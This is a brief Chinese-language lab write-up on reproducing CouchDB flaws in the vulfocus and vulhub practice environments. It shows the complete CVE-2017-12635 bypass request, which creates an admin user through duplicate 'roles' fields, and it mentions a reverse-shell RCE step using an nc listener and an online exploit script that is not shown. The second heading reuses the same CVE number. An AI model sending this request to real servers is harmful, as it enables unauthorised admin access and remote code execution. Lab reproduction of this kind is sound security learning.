CouchDB漏洞复现在vulfocus环境下
一、漏洞复现地址如下:
https://vulfocus.cn/
二、CouchDB复现权限绕过(CVE-2017-12635)
小于 1.7.0 以及 小于 2.1.1
可绕过创建权限而去实现任意创建admin权限的账号 实现登录。
1、正常创建数据包(发现无权限)
2、绕过权限数据包
PUT /_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
3、成功实现绕过,到/_utils 目录下验证登陆。
三、CouchDB复现权限绕过(CVE-2017-12635)
实现权限绕过 并成功登录admin账号后,可实现此漏洞实现rce。直接使用了网上SF的exp脚本反弹shell如下:
这个环境换到了本地搭建的vulhub。
攻击机nc监听,直接执行脚本文件: